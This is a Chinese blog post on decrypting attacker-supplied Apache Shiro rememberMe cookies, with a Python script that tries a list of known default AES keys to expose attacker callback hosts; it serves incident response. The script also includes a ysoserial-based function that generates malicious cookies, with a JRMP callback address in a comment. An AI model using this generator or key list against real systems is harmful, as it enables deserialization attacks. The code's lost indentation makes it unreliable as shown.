java aes加密解密_【奇技淫巧】攻击者发现Apache Shiro payload AES解密

最新推荐文章于 2024-01-12 14:54:41 发布
最新推荐文章于 2024-01-12 14:54:41 发布
阅读量666 收藏
点赞数
文章标签: java aes加密解密 java base64解密 openssl aes padding命令解密

25e6a43986eca4abaf5affa72b6d0c70.gif

攻击者发现-Apache Shiro payload AES解密

恶意 Cookie rememberMe值构造

前16字节的密钥 -> 后面加入序列化参数 -> AES加密 -> base64编码 -> 发送cookie

Apache Shiro处理cookie的流程

得到rememberMe的cookie值 -> Base64解码 -> AES-128-CBC解密-> 反序列化(readobject)。

rememberMe管理器代码中写到cookie加密密钥默认为AES算法,可以将黑客常用的攻击密钥做一个keylist进行解密

下面是加解密脚本(代码比较粗糙)

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
import re

list1 = ['rememberme payload']
def encode_rememberme(command):     # Java序列化 ---> 使用密钥进行AES加密 ---> Base64加密 ---> 得到加密后的remember Me内容
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command],
                             stdout=subprocess.PIPE)    #执行的命令
    popen1 = subprocess.Popen(['java', '-jar',  'ysoserial-0.0.6-SNAPSHOT-all.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    BS = AES.block_size # aes数据分组长度为128 bit
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()   # padding算法
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  #kPH+bIxk5D2deZiIxcaaaA== 泄露的key https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA
    iv = uuid.uuid4().bytes     #生成一个随机的UUID
    mode = AES.MODE_CBC
    encryptor = AES.new(key, mode, iv)
    file_body = pad(popen1.stdout.read())    #pad('java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 118.25.69.**:6666')
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) #使用密钥进行AES加密 Base64加密
    print('rememberme=%s'%base64_ciphertext,'\n')
return base64_ciphertext

def decode_rememberme(payload): #remember Me加密内容 ---> Base64解密 ---> 使用密钥进行AES解密 --->Java反序列化
# keylist = ['fCq+/xW488hMTCD+cmJ3aQ==']
    keylist = ['kPH+bIxk5D2deZiIxcaaaA==','2AvVhdsgUs0FSA3SDFAdag==','3AvVhmFLUs0KTA3Kprsdag==','4AvVhmFLUs0KTA3Kprsdag==','5aaC5qKm5oqA5pyvAAAAAA==','6ZmI6I2j5Y+R5aSn5ZOlAA==','bWljcm9zAAAAAAAAAAAAAA==','wGiHplamyXlVB11UXWol8g==','Z3VucwAAAAAAAAAAAAAAAA==','MTIzNDU2Nzg5MGFiY2RlZg==','U3ByaW5nQmxhZGUAAAAAAA==','5AvVhmFLUs0KTA3Kprsdag==','fCq+/xW488hMTCD+cmJ3aQ==','1QWLxg+NYmxraMoxAXu/Iw==','ZUdsaGJuSmxibVI2ZHc9PQ==','L7RioUULEFhRyxM7a2R/Yg==','r0e3c16IdVkouZgk1TKVMg==','bWluZS1hc3NldC1rZXk6QQ==','a2VlcE9uR29pbmdBbmRGaQ==','WcfHGU25gNnTxTlmJMeSpw==','ZAvph3dsQs0FSL3SDFAdag==','tiVV6g3uZBGfgshesAQbjA==','cmVtZW1iZXJNZQAAAAAAAA==','ZnJlc2h6Y24xMjM0NTY3OA==','RVZBTk5JR0hUTFlfV0FPVQ==','WkhBTkdYSUFPSEVJX0NBVA==']
for key in keylist:
        mode = AES.MODE_CBC
        IV = payload[:16]   # shiro利用arraycopy()方法将随机的16字节IV放到序列化后的数据前面,取前16字节作为iv
        encryptor = AES.new(base64.b64decode(key), mode, IV=IV)
        remember_bin = encryptor.decrypt(payload[16:])
        remember_bin = remember_bin.decode('unicode-escape')
# print(remember_bin)

        pattern = re.compile(r'((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}')
        ip = re.search(pattern, remember_bin)
        ceye = re.search('(\w+)?\.\w+\.ceye.io',remember_bin,re.I)
        dnslog = re.search('(\w+)?\.\w+\.dnslog.cn',remember_bin,re.I)
        burp = re.search('(\w+)?\.\w+\.burpcollaborator.net',remember_bin,re.I)

if ip:
            print('The key is %s. The ip is %s'%(key,ip))
return ip
elif ceye:
            print('The key is %s. The ceye is %s'%(key,ceye))
return ceye
elif dnslog:
            print('The key is %s. The dnslog is %s'%(key,dnslog))
return dnslog
elif burp:
            print('The key is %s. The burp is %s'%(key,burp))
return burp

if __name__ == '__main__':
# payload = encode_rememberme(sys.argv[1])
# try:
#     payload = base64.b64decode(payload)
#     ip = decode_rememberme(payload)
# except:
#     pass
#
for payload in list1:
try:
            tmp = payload
            payload = base64.b64decode(payload)
            data = decode_rememberme(payload)
if data:
                print(tmp)
except:
pass

效果

d2d4e8957883d47b797ae51de64e3f7c.png

8d15f6eefa567a5308b958596f5b2ff3.png

通过以下解密可以查看到攻击者开启JRMP Server的vps还有使用的dns平台(ceye,dnslog,burp等),和攻击日志里的host进行关联,发现攻击者所拥有的基础设施,通过奇技淫巧挖掘出更多攻击者的信息。顺着网线给攻击者查水表。

这里只是举个发现攻击者的小例子,欢迎师傅多多交流。

参考:

https://www.anquanke.com/post/id/193165

1fd42c7331d3709e7dc7cc27b0e92e8b.png

weixin_39930711
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
病毒分析教程第十话--动态解密payload
安全杂货铺
02-10 1662
样本:61c19e7ce627da9b5004371f867a47d3,下载地址:https://app.any.run/tasks/e163502e-3334-46d9-aeb7-e5c925b64af7。 bp VirtualProtect bp VirtualAlloc
pdfbox java.lang.outofmemoryerror_Apache PdfBox
weixin_28785657的博客
02-27 551
业务叙述技术是为了业务服务的,所以讨论技术的时候离不开业务场景。故此先进行简述:最近在做一个从数据库读取pdf文件并且解析成文字进行分析的功能。由于本人对垃圾回收也是略有涉猎,因此代码设计上基本不存在本应该回收但是却无法回收的情况。然而,这个程序用springboot启动后一段时间就会出现oom错误,错误日志如下:java.lang.OutOfMemoryError: Java heap spac...
shiro 提供的AES 对称式加密/解密算法
莲藕码夫的博客
03-29 3100
来源:http://jinnianshilongnian.iteye.com/blog/2021439AesCipherService aesCipherService = new AesCipherService(); aesCipherService.setKeySize(128); //设置key长度 //生成key Key key = aesCipherService.gene...
四、Shiro加密
panchang199266的博客
09-07 308
(一)md5散列加密   一般来说,我们后端会将前端接收到的密码进行加密,再存进数据库中,所以这里的逻辑主要发生在存入数据库之前。 public class CustomRealmTest { @Test public void testCustomRealm(){ CustomRealm customRealm = new CustomRealm(); ...
Shiro加密处理
u012737182的博客
11-13 490
1、定义一个专门负责取得加密后密码的工具类。 本次采用的是MD5加密处理public class MyPasswordEncrypt { private static final String SALT = "*****************"; /** * 提供有密码的加密处理操作 * @param password * @return
AES、RSA加解密工具类
最新发布
muguazhi的博客
01-12 2382
AES、RSA加解密工具类
Java 8中Stream API的这些奇技淫巧!你Get了吗?
08-25
Java 8 中 Stream API 的奇技淫巧 Java 8 中的 Stream API 是一种功能强大且实用的数据处理工具,能够帮助开发者更高效地处理数据。Stream API 的出现是为了解决 Java 中处理数据的痛点,提供了一种简洁、灵活、...
Java编程中使用lambda表达式的奇技淫巧
09-02
Java编程中,Lambda表达式是一种强大的功能,它在Java 8中被引入,极大地简化了处理函数式接口的方式。Lambda表达式的核心理念是能够直接传递代码块,而不是通过创建匿名内部类的方式来实现。这种技术使得代码更加...
三维叉乘怎么算_奇技淫巧系列:向量叉乘
weixin_39866966的博客
11-21 5020
​一般我们在解决立体几何题目时会选择建立坐标系,因为这样做比较保险也有固定套路。很多时候这些题目要求你计算某一个面的法向量(normal vector),这在高中阶段也是有固定方法的,我们这里想要介绍的是一种更高级也更迅速的方法,也就是引入向量叉乘(cross product,“向量”同物理中的“矢量”概念,一直想不通为啥数学和物理用不一样的名字,英文都是vector)这一概念。我们都学过向量的标...
java 实现dns劫持_JavaScript 防 http 劫持与 XSS
weixin_39629947的博客
02-16 584
原标题:JavaScript 防 http 劫持与 XSS原文作者:作为前端,一直以来都知道HTTP劫持与XSS跨站脚本(Cross-site ing)、CSRF跨站请求伪造(Cross-site request forgery)。但是一直都没有深入研究过,前些日子同事的分享会偶然提及,我也对这一块很感兴趣,便深入研究了一番。最近用 Java 写了一个组件,可以在前端层面防御部分 HTTP 劫持与...
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
shiro550代码审计(巨详细)--加密部分
zyer
03-16 5809
找了一下大佬的文章借鉴了一下shiro550的利用流程 (Shiro 550 反序列化漏洞 详细分析+poc编写) 简单介绍利用: 通过在cookie的rememberMe字段中插入恶意payload, 触发shiro框架的rememberMe的反序列化功能,导致任意代码执行。 shiro 1.2.24中,提供了硬编码的AES密钥:kPH+bIxk5D2deZiIxcaaaA== 由于开发人员未修改AES密钥而直接使用Shiro框架,导致了该问题 于是我们......
从 XSS Payload 学习浏览器解码
m0_61579490的博客
07-26 320
从 XSS Payload 学习浏览器解码
使用shiroaes加密遇到的一些问题
ranger2的博客
08-10 696
使用shiroaes加密遇到的一些问题 背景说明 游戏服务器领域。 client使用账号信息与平台交互,平台返回一个凭据(内部包含了敏感信息)。 client拿到凭据后,向登入服发起登入请求。 登入服对凭证进行校验,解密出一些关键数据,然后触发登入处理逻辑。 相关代码 /** * 根据密钥生成一个用于aes的key。 */ public static SecretKey getSecretKey(int bits, String secret) {
省省回头车payload算法加解密省省回头车7.7.0
qq_50127494的博客
03-18 1128
最新版省省回头车7.7.0 payload 算法 省省回头车抢单 代码仅供学习交流,请勿用于非法用途,如有疑问,请或查看最下方资料卡与我联系交流APP是爱加密企业版的壳脱壳这里查壳脱壳就不在讲解了,自行百度或者参考以下文章该APP还有一个主要限制,即APP防抓包,新手一般连包都无法抓到如果手机已经完成 Root,我们只需要将第三方证书移动(比如:小黄鸟、Charles 等)移动到系统证书目录即可这里通过小黄鸟 App 及 Charles 进行讲解,Fiddler 类似手机root方法不在讲解自行百度。
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现
玄道的网安博客
03-05 866
简介 Apache Shiro是一套用于执行认证、授权、加密和会话管理的Java安全框架。 影响版本 Apache Shiro < 1.2.5 环境搭建 这里使用docker来搭建 环境地址 https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437 进入目录并启动Apache Shiro 1.2.4的Web服务 cd vulhub-master/shiro/CVE-201...
200个shiro_key
weixin_46137328的博客
03-18 4152
0AvVhmFLUs0KTA3Kprsdag== 1AvVhdsgUs0FSA3SDFAdag== 1QWLxg+NYmxraMoxAXu/Iw== 1tC/xrDYs8ey+sa3emt...
Java安全框架shiro(一)
qq_65647788的博客
01-31 514
shiro是一个功能强大且易于使用的Java安全框架,用于执行身份验证,授权,加密和会话管理。使用Shiro易于理解的API,您可以快速轻松地保护任何应用程序-从最小的移动应用程序到最大的Web和企业应用程序。
Java 8 Lambda技巧:简化代码与接口实现
Java编程中使用lambda表达式的奇技淫巧Java 8引入的一项重要特性,它极大地简化了代码,并提高了代码的可读性和可维护性。lambda表达式的核心在于其能够直接传递函数,无需创建单独的接口实现或者匿名内部类,这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值